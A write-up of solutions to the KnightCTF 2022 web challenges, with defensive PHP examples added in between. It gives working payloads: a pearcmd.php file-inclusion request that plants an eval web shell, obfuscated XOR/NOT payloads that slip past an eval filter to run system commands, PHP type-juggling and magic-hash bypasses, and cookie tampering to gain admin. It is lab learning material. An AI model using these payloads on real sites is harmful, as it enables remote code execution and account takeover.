KnightCTF WEB
2022-06-30 14:19:00 【Ff. cheng】
Preface
It's not hard; it mostly comes down to fuzzing and lateral thinking.
Do Something Special
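Clicking the button navigates to /[email protected]_y#[email protected]_h3r3! . The # is obviously the problem: the browser treats it as the start of a fragment and never sends the rest to the server. URL-encode it as %23 and the request returns the flag.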
Flag:KCTF{Sp3cial_characters_need_t0_get_Url_enc0ded}
My PHP Site

File inclusion. You can read the source code with a pseudo-protocol, or include pearcmd.php directly to get a shell.
payload
/?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/shell.php+-d+man_dir=<?eval($_POST[0]);?>+-s+
Then include the written file to execute commands.

FLAG: KCTF{L0C4L_F1L3_1ncLu710n}
Obsfuscation Isn’t Enough
Viewing the HTML source reveals JSFuck.
Decoding it reveals 150484514b6eeb1d99da836d95f6671d.php
Access the PHP file directly.
FLAG: KCTF{0bfuscat3d_J4v4Scr1pt_aka_JSFuck}
Zero is not the limit
Hint: /user/
The start page returns a pile of JSON.

Each entry under /user/ corresponds to a user; visiting -1 gives the flag.
FLAG: KCTF{tHeRe_1s_n0_l1m1t}
Find Pass Code – 1
Found a comment:
Hi Serafin, I learned something new today.
I build this website for you to verify our KnightCTF 2022 pass code. You can view the source code by sending the source param
Visit url/?source to get the source code:
<?php
require "flag.php";
if (isset($_POST["pass_code"])) {
    if (strcmp($_POST["pass_code"], $flag) == 0) {
        echo "KCTF Flag : {$flag}";
    } else {
        echo "Oh....My....God. You entered the wrong pass code.<br>";
    }
}
if (isset($_GET["source"])) {
    print show_source(__FILE__);
}
?>
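Array bypass. POST: pass_code[]=1
Before PHP 8, strcmp() returns NULL when it is handed an array, and NULL == 0 is true under loose comparison.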
FLAG: KCTF{ShOuLd_We_UsE_sTrCmP_lIkE_tHaT}
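The array bypass next to a hardened check, as an added example that is not part of the original write-up or the challenge. `$flag` is a constructed placeholder and both function names are hypothetical.

```php
<?php
// Added example; $flag is a constructed placeholder, not the challenge's value.
$flag = 'KCTF{constructed_placeholder}';

// The challenge's comparison, wrapped so it can be called with any input type.
// PHP 5.3 to 7.x: strcmp(array, string) warns and returns NULL, and NULL == 0.
// PHP 8+: strcmp() throws TypeError, so the array never reaches the comparison.
function vulnerable_check($input, string $flag): bool
{
    try {
        return @strcmp($input, $flag) == 0;
    } catch (TypeError $e) {
        return false;
    }
}

// Hardened: reject anything that is not a string, then compare byte for byte
// in constant time. hash_equals() never applies type juggling.
function hardened_check($input, string $flag): bool
{
    return is_string($input) && hash_equals($flag, $input);
}

// pass_code[]=1 arrives in $_POST as ['pass_code' => ['1']].
$cases = [
    'array (pass_code[]=1)' => ['1'],
    'wrong string'          => 'constructed-guess',
    'correct string'        => $flag,
];
foreach ($cases as $label => $input) {
    printf("%-22s vulnerable=%s hardened=%s\n", $label,
        var_export(vulnerable_check($input, $flag), true),
        var_export(hardened_check($input, $flag), true));
}
```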
Most Secure Calculator-1

Source code
<?php
if (isset($_POST["equation"]) && !is_array($_POST["equation"])) {
    if (empty($_POST["equation"])) {
        echo "Please enter some eqation.";
    } else {
        if (strlen($_POST["equation"]) >= 25) {
            echo "Oow ! You have entered an equation that is too big for me.";
        } else {
            echo "<h1> Result : <br>";
            eval("echo " . $_POST["equation"] . ";");
            echo "</h1>";
        }
    }
}
?>
The input goes straight into eval().
FLAG:KCTF{WaS_mY_cAlCuLaToR_sAfE}
Find Pass Code - 2
- Magic hash
- md5
<?php
require "flag.php";
$old_pass_codes = array("0e215962017", "0e730083352", "0e807097110", "0e840922711");
$old_pass_flag = false;
if (isset($_POST["pass_code"]) && !is_array($_POST["pass_code"])) {
    foreach ($old_pass_codes as $old_pass_code) {
        if ($_POST["pass_code"] === $old_pass_code) {
            $old_pass_flag = true;
            break;
        }
    }
    if ($old_pass_flag) {
        echo "Sorry ! It's an old pass code.";
    } else if ($_POST["pass_code"] == md5($_POST["pass_code"])) {
        echo "KCTF Flag : {$flag}";
    } else {
        echo "Oh....My....God. You entered the wrong pass code.<br>";
    }
}
if (isset($_GET["source"])) {
    print show_source(__FILE__);
}
?>
Brute-forcing is impractical. Here are some collected magic hashes; just pick one that is not in $old_pass_codes.
Magic hashes (input:md5)
0e215962017:0e291242476940776845150308577824
0e730083352:0e870635875304277170259950255928
0e807097110:0e318093639164485566453180786895
0e840922711:00e64922204642369621338070008986
0e1137126905:0e291659922323405260514745084877
0e1284838308:0e708279691820928818722257405159
0e2799298535:0e258310720843549656960157258725
0e3335999050:0e130023719718288785799459522477
0e3519466817:0e094940930906507337180165634011
FLAG:KCTF{ShOuD_wE_cOmPaRe_MD5_LiKe_ThAt__Be_SmArT}
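Why the loose `==` matches, as an added example that is not part of the original write-up. It generalises the challenge's self-comparison to the more common case of a stored digest: the two pass codes come from the list above, while the stored-digest scenario and the function names are assumptions.

```php
<?php
// Added example, not the challenge's code. The two pass codes are taken from
// the magic-hash list on this page; the stored-digest scenario is assumed.

// True when loose == would parse the string as the float 0 in exponent form.
function is_zero_exponent(string $s): bool
{
    return preg_match('/^0+e[0-9]+$/i', $s) === 1;
}

// Loose: two numeric strings are compared as numbers, so 0e111 == 0e222.
function digest_matches_loose(string $stored, string $input): bool
{
    return $stored == md5($input);
}

// Strict: byte-for-byte, constant-time comparison of the two digests.
function digest_matches_strict(string $stored, string $input): bool
{
    return hash_equals($stored, md5($input));
}

$stored = md5('0e215962017');   // digest on file for the legitimate pass code
foreach (['0e215962017', '0e1137126905', 'constructed-wrong-guess'] as $input) {
    printf("%-24s md5=%s zero-exp=%s loose=%s strict=%s\n",
        $input, md5($input),
        var_export(is_zero_exponent(md5($input)), true),
        var_export(digest_matches_loose($stored, $input), true),
        var_export(digest_matches_strict($stored, $input), true));
}
```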
Bypass!! Bypass!! Bypass!!
Found a comment:
<!-- generats auth token -> /api/request/auth_token -->
Attempts to bypass the 403 failed.
/api/request/auth_token Allow: POST, OPTIONS
/ Allow: GET, HEAD, OPTIONS
Searching GitHub turns up the source code: bug-bounty-labs
Add the header:
X-Authorized-For: <acquired token>
FLAG:KCTF{cOngRatUlaT10Ns_wElCoMe_t0_y0ur_daShBoaRd}
Most Secure Calculator -2
Only alphanumeric... is allowed, so the bypass is XOR or bitwise NOT; fuzz a little to construct the command.
payload
(~%8C%86%8C%8B%9A%92)(~%D7%DD%8F%88%9B%DD%D6%C4)
("393480"^"@@@@]]")(("[email protected]!8"^"[@@`^@_").(".").("484"^"@@@"))
"\163\171\163\164\145\155"("\143\141\164\40\146\154\141\147\56\164\170\164")
FLAG: KCTF{sHoUlD_I_uSe_eVaL_lIkE_tHaT}
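What both calculator challenges (Most Secure Calculator-1 and -2) would look like without eval(), as an added example that is not the challenge's code: a small recursive-descent evaluator that accepts only numbers, + - * / and parentheses. The function names and sample inputs are constructed; the 25-character limit mirrors the source shown for Calculator-1.

```php
<?php
// Added example, not the challenge's code: + - * / and parentheses, no eval().
function calc(string $src): float
{
    preg_match_all('/\d+(?:\.\d+)?|[-+*\/()]/', $src, $m);
    // The tokens must rebuild the whole input, so letters, quotes, ~ ^ % are rejected.
    if (strlen($src) >= 25 || implode('', $m[0]) !== preg_replace('/\s+/', '', $src)) {
        throw new InvalidArgumentException('rejected input');
    }
    $i = 0;
    $v = calc_expr($m[0], $i);
    if ($i !== count($m[0])) throw new InvalidArgumentException('trailing tokens');
    return $v;
}
function calc_expr(array $t, int &$i): float    // expr := term (('+'|'-') term)*
{
    $v = calc_term($t, $i);
    while (in_array($t[$i] ?? null, ['+', '-'], true)) {
        $v = $t[$i++] === '+' ? $v + calc_term($t, $i) : $v - calc_term($t, $i);
    }
    return $v;
}
function calc_term(array $t, int &$i): float    // term := factor (('*'|'/') factor)*
{
    $v = calc_factor($t, $i);
    while (in_array($t[$i] ?? null, ['*', '/'], true)) {
        $op = $t[$i++];
        $r = calc_factor($t, $i);
        if ($op === '/' && $r == 0.0) throw new DivisionByZeroError('division by zero');
        $v = $op === '*' ? $v * $r : $v / $r;
    }
    return $v;
}
function calc_factor(array $t, int &$i): float  // factor := number | '-' factor | '(' expr ')'
{
    $tok = $t[$i++] ?? null;
    if ($tok === '-') return -calc_factor($t, $i);
    if ($tok === '(') {
        $v = calc_expr($t, $i);
        if (($t[$i++] ?? null) !== ')') throw new InvalidArgumentException('missing )');
        return $v;
    }
    if ($tok === null || !is_numeric($tok)) throw new InvalidArgumentException('unexpected token');
    return (float) $tok;
}
// Constructed inputs: two valid expressions, a division by zero, two rejected strings.
foreach (['2*(3+4)-1', '-(1.5+2)/7', '1/0', 'phpinfo()', '(~1)'] as $in) {
    try { $out = calc($in); } catch (Throwable $e) { $out = get_class($e) . ': ' . $e->getMessage(); }
    echo str_pad($in, 12), ' => ', $out, "\n";
}
```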
Can you be Admin?
User-Agent: KnightSquad
Next:
Referer: localhost
Decoding the JSFuck yields Unicode escapes; decode them with a Unicode encoder/decoder (bt.cn):
F`V,[email protected]<,q!$?0EpF*DPCA0<oU8RZI/DJ<`sF8
Then ASCII85-decode it (with an ASCII85 decoding calculator):
username : tareq ,password : IamKnight
After logging in you are an ordinary user. The response sets a cookie with a strange field; base64-decode it, change the value to Admin, and send the request again to get the flag.
FLAG: KCTF{FiN4LlY_y0u_ar3_4dm1N}
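How a server can detect the cookie edit described above, as an added example that is not the challenge's code: the role travels in a base64 cookie, so the server attaches an HMAC and rejects any cookie whose MAC does not verify. The key, the claim names and the cookie layout are assumptions.

```php
<?php
// Added example; key, claim names and cookie layout are assumptions.
// Keeping the role in a server-side session avoids the problem entirely;
// this shows the minimum needed if the role must live in the cookie.
const COOKIE_KEY = 'constructed-demo-key-replace-with-random-secret';

function issue_cookie(array $claims): string
{
    $body = base64_encode(json_encode($claims));
    return $body . '.' . hash_hmac('sha256', $body, COOKIE_KEY);
}

// Returns the claims, or null when the cookie is malformed or was modified.
function read_cookie(string $cookie): ?array
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$body, $mac] = $parts;
    if (!hash_equals(hash_hmac('sha256', $body, COOKIE_KEY), $mac)) {
        return null;
    }
    $claims = json_decode((string) base64_decode($body, true), true);
    return is_array($claims) ? $claims : null;
}

$cookie = issue_cookie(['user' => 'tareq', 'role' => 'User']);

// The edit from the write-up: decode, change the role, re-encode, keep the old MAC.
[$body, $mac] = explode('.', $cookie, 2);
$edited = base64_encode(str_replace('"User"', '"Admin"', base64_decode($body))) . '.' . $mac;

echo 'original: ', var_export(read_cookie($cookie), true), "\n";
echo 'edited:   ', var_export(read_cookie($edited), true), "\n";
```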